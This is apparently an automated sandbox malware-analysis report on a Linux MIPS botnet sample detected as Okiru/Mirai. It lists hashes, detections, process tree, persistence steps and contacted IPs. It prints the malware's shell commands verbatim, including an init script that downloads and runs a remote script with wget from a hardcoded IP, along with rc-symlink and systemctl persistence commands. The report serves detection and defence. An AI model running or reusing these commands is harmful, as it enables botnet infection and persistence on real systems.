Edit tour

Linux Analysis Report
mipsel.nn.elf

Overview

General Information

Sample name:	mipsel.nn.elf
Analysis ID:	1580328
MD5:	c07c769680b684bce01e72800bd11635
SHA1:	ba5700e7489f5ae48ce165b58a43a68148978060
SHA256:	799df6ce4695925d10cb52f413cceda3b9045d9dfa3039f8c7fed403f423d2ea
Tags:	elfuser-abuse_ch
Infos:

Detection

Okiru

Score:	80
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Yara detected Okiru

Drops files in suspicious directories

Sample tries to persist itself using /etc/profile

Sample tries to persist itself using System V runlevels

Sample tries to set files in /etc globally writable

Detected TCP or UDP traffic on non-standard ports

Enumerates processes within the "proc" file system

Executes commands using a shell command-line interpreter

Executes the "chmod" command used to modify permissions

Executes the "mkdir" command used to create folders

Executes the "systemctl" command used for controlling the systemd system and service manager

Found strings indicative of a multi-platform dropper

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Sample has stripped symbol table

Sample listens on a socket

Sample tries to set the executable flag

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Uses the "uname" system call to query kernel version information (possible evasion)

Writes shell script file to disk with an unusual file extension

Classification

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1580328
Start date and time:	2024-12-24 09:42:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 54s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	mipsel.nn.elf
Detection:	MAL
Classification:	mal80.spre.troj.evad.linELF@0/10@0/0

Runtime Messages

Command:	/tmp/mipsel.nn.elf
PID:	6236
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	The Gorilla Botnet Cats Came After You!
Standard Error:

Process Tree

system is lnxubuntu20

mipsel.nn.elf (PID: 6236, Parent: 6163, MD5: 0d6f61f82cf2f781c6eb0661071d42d9) Arguments: /tmp/mipsel.nn.elf

mipsel.nn.elf New Fork (PID: 6251, Parent: 6236)

sh (PID: 6251, Parent: 6236, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable custom.service >/dev/null 2>&1"

sh New Fork (PID: 6264, Parent: 6251)

systemctl (PID: 6264, Parent: 6251, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable custom.service

mipsel.nn.elf New Fork (PID: 6284, Parent: 6236)

sh (PID: 6284, Parent: 6236, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"

sh New Fork (PID: 6293, Parent: 6284)

chmod (PID: 6293, Parent: 6284, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/system

mipsel.nn.elf New Fork (PID: 6294, Parent: 6236)

sh (PID: 6294, Parent: 6236, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"

sh New Fork (PID: 6296, Parent: 6294)

ln (PID: 6296, Parent: 6294, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/system /etc/rcS.d/S99system

mipsel.nn.elf New Fork (PID: 6297, Parent: 6236)

sh (PID: 6297, Parent: 6236, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"#!/bin/sh\n# /etc/init.d/mipsel.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting mipsel.nn.elf'\n /tmp/mipsel.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping mipsel.nn.elf'\n killall mipsel.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/mipsel.nn.elf"

mipsel.nn.elf New Fork (PID: 6299, Parent: 6236)

sh (PID: 6299, Parent: 6236, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/mipsel.nn.elf >/dev/null 2>&1"

sh New Fork (PID: 6301, Parent: 6299)

chmod (PID: 6301, Parent: 6299, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/mipsel.nn.elf

mipsel.nn.elf New Fork (PID: 6302, Parent: 6236)

sh (PID: 6302, Parent: 6236, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"

sh New Fork (PID: 6306, Parent: 6302)

mkdir (PID: 6306, Parent: 6302, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir -p /etc/rc.d

mipsel.nn.elf New Fork (PID: 6308, Parent: 6236)

sh (PID: 6308, Parent: 6236, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/mipsel.nn.elf /etc/rc.d/S99mipsel.nn.elf >/dev/null 2>&1"

sh New Fork (PID: 6310, Parent: 6308)

ln (PID: 6310, Parent: 6308, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/mipsel.nn.elf /etc/rc.d/S99mipsel.nn.elf

mipsel.nn.elf New Fork (PID: 6311, Parent: 6236)

mipsel.nn.elf New Fork (PID: 6313, Parent: 6311)

udisksd New Fork (PID: 6248, Parent: 799)

dumpe2fs (PID: 6248, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

systemd New Fork (PID: 6277, Parent: 6276)

snapd-env-generator (PID: 6277, Parent: 6276, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

udisksd New Fork (PID: 6323, Parent: 799)

dumpe2fs (PID: 6323, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

udisksd New Fork (PID: 6356, Parent: 799)

dumpe2fs (PID: 6356, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
mipsel.nn.elf	JoeSecurity_Okiru	Yara detected Okiru	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
6236.1.00007f3b2c400000.00007f3b2c41c000.r-x.sdmp	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
Process Memory Space: mipsel.nn.elf PID: 6236	JoeSecurity_Okiru	Yara detected Okiru	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: mipsel.nn.elf

Avira: detected

Multi AV Scanner detection for submitted file

Source: mipsel.nn.elf

ReversingLabs: Detection: 39%

Source: mipsel.nn.elf

String: tmpfs/tmp/ttsize=10M/tmp/tt/system/proc/%d/proc/proc/%u/statusrPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.234locked Process: PID=%d, Bot-ID:%sFound And Killed Process: PID=%d, Realpath=%s, Bot-ID:%s2surf2/proc/%d/exe/proc/%d/cmdlinewgetcurlunknown%s (URL: %s)/./fd/socket/proc/%d/mountinfo/ /proc-altered/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencoder/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/init/opt/app/var/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincisshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/ping/pswiresharkechotcpdumpnetstatpythoniptablesnanonvimvimgdbpkillkillallapt/bin/loginnfstftpftpmalloc[start_pid_hopping] Failed to clone: %s

Source: global traffic

TCP traffic: 192.168.2.23:60010 -> 94.156.227.234:38242

Source: /tmp/mipsel.nn.elf (PID: 6236)

Socket: 0.0.0.0:38242

Jump to behavior

Source: global traffic	TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global traffic	TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic	TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80

Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234

Source: mipsel.nn.elf, mipsel.nn.elf.32.dr, profile.12.dr, system.12.dr, inittab.12.dr, bootcmd.12.dr, custom.service.12.dr	String found in binary or memory: http://94.156.227.233/
Source: mipsel.nn.elf	String found in binary or memory: http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

Source: Initial sample	String containing 'busybox' found: /bin/busybox
Source: Initial sample	String containing 'busybox' found: tmpfs/tmp/ttsize=10M/tmp/tt/system/proc/%d/proc/proc/%u/statusrPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.234locked Process: PID=%d, Bot-ID:%sFound And Killed Process: PID=%d, Realpath=%s, Bot-ID:%s2surf2/proc/%d/exe/proc/%d/cmdlinewgetcurlunknown%s (URL: %s)/./fd/socket/proc/%d/mountinfo/ /proc-altered/usr/lib/systemd//usr/sbin//usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd*deamon/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencoder/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/init/opt/app/var/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincisshwatchdog/var/spool/var/Sofi

Source: ELF static info symbol of initial sample

.symtab present: no

Source: classification engine

Classification label: mal80.spre.troj.evad.linELF@0/10@0/0

Persistence and Installation Behavior

Sample tries to persist itself using /etc/profile

Source: /tmp/mipsel.nn.elf (PID: 6236)

File: /etc/profile

Jump to behavior

Sample tries to persist itself using System V runlevels

Source: /tmp/mipsel.nn.elf (PID: 6236)	File: /etc/rc.local	Jump to behavior
Source: /usr/bin/ln (PID: 6296)	File: /etc/rcS.d/S99system -> /etc/init.d/system	Jump to behavior
Source: /usr/bin/ln (PID: 6310)	File: /etc/rc.d/S99mipsel.nn.elf -> /etc/init.d/mipsel.nn.elf	Jump to behavior

Sample tries to set files in /etc globally writable

Source: /tmp/mipsel.nn.elf (PID: 6236)	File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6293)	File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6301)	File: /etc/init.d/mipsel.nn.elf (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Source: /tmp/mipsel.nn.elf (PID: 6313)	File opened: /proc/6373/status	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6313)	File opened: /proc/6395/status	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6313)	File opened: /proc/6372/status	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6313)	File opened: /proc/6394/status	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6313)	File opened: /proc/6397/status	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6313)	File opened: /proc/6396/status	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6313)	File opened: /proc/6399/status	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6313)	File opened: /proc/6398/status	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6313)	File opened: /proc/6356/status	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6313)	File opened: /proc/6391/status	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6313)	File opened: /proc/6390/status	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6313)	File opened: /proc/6371/status	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6313)	File opened: /proc/6393/status	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6313)	File opened: /proc/6370/status	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6313)	File opened: /proc/6073/cmdline	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6313)	File opened: /proc/6392/status	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6313)	File opened: /proc/799/cmdline	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6313)	File opened: /proc/6384/status	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6313)	File opened: /proc/6383/status	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6313)	File opened: /proc/6386/status	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6313)	File opened: /proc/6385/status	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6313)	File opened: /proc/6388/status	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6313)	File opened: /proc/6387/status	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6313)	File opened: /proc/6389/status	Jump to behavior

Source: /tmp/mipsel.nn.elf (PID: 6251)	Shell command executed: sh -c "systemctl enable custom.service >/dev/null 2>&1"	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6284)	Shell command executed: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6294)	Shell command executed: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6297)	Shell command executed: sh -c "echo \"#!/bin/sh\n# /etc/init.d/mipsel.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting mipsel.nn.elf'\n /tmp/mipsel.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping mipsel.nn.elf'\n killall mipsel.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start\|stop\|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/mipsel.nn.elf"	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6299)	Shell command executed: sh -c "chmod +x /etc/init.d/mipsel.nn.elf >/dev/null 2>&1"	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6302)	Shell command executed: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6308)	Shell command executed: sh -c "ln -s /etc/init.d/mipsel.nn.elf /etc/rc.d/S99mipsel.nn.elf >/dev/null 2>&1"	Jump to behavior

Source: /bin/sh (PID: 6293)	Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/system			Jump to behavior
Source: /bin/sh (PID: 6301)	Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/mipsel.nn.elf			Jump to behavior

Source: /bin/sh (PID: 6306)

Mkdir executable: /usr/bin/mkdir -> mkdir -p /etc/rc.d

Jump to behavior

Source: /bin/sh (PID: 6264)

Systemctl executable: /usr/bin/systemctl -> systemctl enable custom.service

Jump to behavior

Source: /tmp/mipsel.nn.elf (PID: 6236)	File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6293)	File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6301)	File: /etc/init.d/mipsel.nn.elf (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Source: /tmp/mipsel.nn.elf (PID: 6236)	Writes shell script file to disk with an unusual file extension: /etc/init.d/system	Jump to dropped file
Source: /tmp/mipsel.nn.elf (PID: 6236)	Writes shell script file to disk with an unusual file extension: /etc/rc.local	Jump to dropped file
Source: /bin/sh (PID: 6297)	Writes shell script file to disk with an unusual file extension: /etc/init.d/mipsel.nn.elf	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Drops files in suspicious directories

Source: /tmp/mipsel.nn.elf (PID: 6236)	File: /etc/init.d/system			Jump to dropped file
Source: /bin/sh (PID: 6297)	File: /etc/init.d/mipsel.nn.elf			Jump to dropped file

Source: /tmp/mipsel.nn.elf (PID: 6236)

Queries kernel information via 'uname':

Jump to behavior

Source: mipsel.nn.elf, 6236.1.0000556b5af0d000.0000556b5afb5000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/mipsel
Source: mipsel.nn.elf, 6236.1.0000556b5af0d000.0000556b5afb5000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt
Source: mipsel.nn.elf, 6236.1.00007ffc22f1c000.00007ffc22f3d000.rw-.sdmp	Binary or memory string: WkU/tmp/qemu-open.G1igFI\Ds
Source: mipsel.nn.elf, 6236.1.00007ffc22f1c000.00007ffc22f3d000.rw-.sdmp	Binary or memory string: /tmp/qemu-open.G1igFI
Source: mipsel.nn.elf, 6236.1.00007ffc22f1c000.00007ffc22f3d000.rw-.sdmp	Binary or memory string: /qemu-open.XXXXX
Source: mipsel.nn.elf, 6236.1.0000556b5af0d000.0000556b5afb5000.rw-.sdmp	Binary or memory string: ZkU!/etc/qemu-binfmt/mipsel
Source: mipsel.nn.elf, 6236.1.0000556b5af0d000.0000556b5afb5000.rw-.sdmp	Binary or memory string: /usr/bin/vmtoolsd
Source: mipsel.nn.elf, 6236.1.0000556b5af0d000.0000556b5afb5000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmtP
Source: mipsel.nn.elf, 6236.1.00007ffc22f1c000.00007ffc22f3d000.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-mipsel/tmp/mipsel.nn.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/mipsel.nn.elf
Source: mipsel.nn.elf, 6236.1.00007ffc22f1c000.00007ffc22f3d000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-mipsel
Source: mipsel.nn.elf, 6236.1.0000556b5af0d000.0000556b5afb5000.rw-.sdmp	Binary or memory string: ZkU/etc/qemu-binfmt
Source: mipsel.nn.elf, 6236.1.0000556b5af0d000.0000556b5afb5000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmtP /proc/3021/exeddressbooQ0
Source: mipsel.nn.elf, 6236.1.0000556b5af0d000.0000556b5afb5000.rw-.sdmp	Binary or memory string: ZkU!/usr/bin/vmtoolsd

Stealing of Sensitive Information

Yara detected Okiru

Source: Yara match	File source: mipsel.nn.elf, type: SAMPLE
Source: Yara match	File source: 6236.1.00007f3b2c400000.00007f3b2c41c000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mipsel.nn.elf PID: 6236, type: MEMORYSTR

Remote Access Functionality

Yara detected Okiru

Source: Yara match	File source: mipsel.nn.elf, type: SAMPLE
Source: Yara match	File source: 6236.1.00007f3b2c400000.00007f3b2c41c000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mipsel.nn.elf PID: 6236, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	Valid Accounts	Windows Management Instrumentation	1 Unix Shell Configuration Modification	1 Unix Shell Configuration Modification	1 Masquerading	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	1 Data Manipulation
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Systemd Service	1 Systemd Service	2 File and Directory Permissions Modification	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Scripting	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
mipsel.nn.elf	39%	ReversingLabs	Linux.Backdoor.Mirai
mipsel.nn.elf	100%	Avira	EXP/ELF.Mirai.W

Dropped Files

Source	Detection	Scanner	Label	Link
/etc/rc.local	0%	ReversingLabs
/etc/rc.local	0%	Virustotal		Browse

Name	Source	Malicious	Antivirus Detection	Reputation
http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s	mipsel.nn.elf	false		high
http://94.156.227.233/	mipsel.nn.elf, mipsel.nn.elf.32.dr, profile.12.dr, system.12.dr, inittab.12.dr, bootcmd.12.dr, custom.service.12.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
109.202.202.202	unknown	Switzerland	13030	INIT7CH	false
94.156.227.234	unknown	Bulgaria	57463	NETIXBG	false
91.189.91.43	unknown	United Kingdom	41231	CANONICAL-ASGB	false
91.189.91.42	unknown	United Kingdom	41231	CANONICAL-ASGB	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
109.202.202.202	kpLwzBouH4.elf	Get hash	malicious	Unknown	Browse	ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
94.156.227.234	powerpc.nn.elf	Get hash	malicious	Okiru	Browse
	sparc.nn.elf	Get hash	malicious	Okiru	Browse
	arm7.nn-20241224-0652.elf	Get hash	malicious	Mirai, Okiru	Browse
	arm.nn-20241224-0652.elf	Get hash	malicious	Okiru	Browse
	mips.nn.elf	Get hash	malicious	Okiru	Browse
	arm5.nn.elf	Get hash	malicious	Okiru	Browse
	sh4.nn.elf	Get hash	malicious	Okiru	Browse
	mips.nn.elf	Get hash	malicious	Okiru	Browse
	x86_64.nn.elf	Get hash	malicious	Okiru	Browse
	sh4.nn.elf	Get hash	malicious	Okiru	Browse
91.189.91.43	arm6.elf	Get hash	malicious	Unknown	Browse
	hmips.elf	Get hash	malicious	Unknown	Browse
	sparc.nn.elf	Get hash	malicious	Okiru	Browse
	nsharm6.elf	Get hash	malicious	Unknown	Browse
	arm7.nn-20241224-0652.elf	Get hash	malicious	Mirai, Okiru	Browse
	mips.nn.elf	Get hash	malicious	Okiru	Browse
	m68k.nn.elf	Get hash	malicious	Okiru	Browse
	arm6.nn.elf	Get hash	malicious	Okiru	Browse
	arm5.nn.elf	Get hash	malicious	Okiru	Browse
	sh4.nn.elf	Get hash	malicious	Okiru	Browse
91.189.91.42	arm6.elf	Get hash	malicious	Unknown	Browse
	hmips.elf	Get hash	malicious	Unknown	Browse
	sparc.nn.elf	Get hash	malicious	Okiru	Browse
	nsharm6.elf	Get hash	malicious	Unknown	Browse
	arm7.nn-20241224-0652.elf	Get hash	malicious	Mirai, Okiru	Browse
	mips.nn.elf	Get hash	malicious	Okiru	Browse
	m68k.nn.elf	Get hash	malicious	Okiru	Browse
	arm6.nn.elf	Get hash	malicious	Okiru	Browse
	arm5.nn.elf	Get hash	malicious	Okiru	Browse
	sh4.nn.elf	Get hash	malicious	Okiru	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CANONICAL-ASGB	arm6.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	hmips.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	sparc.nn.elf	Get hash	malicious	Okiru	Browse	91.189.91.42
	nsharm6.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	arm7.nn-20241224-0652.elf	Get hash	malicious	Mirai, Okiru	Browse	91.189.91.42
	mips.nn.elf	Get hash	malicious	Okiru	Browse	91.189.91.42
	m68k.nn.elf	Get hash	malicious	Okiru	Browse	91.189.91.42
	arm6.nn.elf	Get hash	malicious	Okiru	Browse	91.189.91.42
	arm5.nn.elf	Get hash	malicious	Okiru	Browse	91.189.91.42
	sh4.nn.elf	Get hash	malicious	Okiru	Browse	91.189.91.42
CANONICAL-ASGB	arm6.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
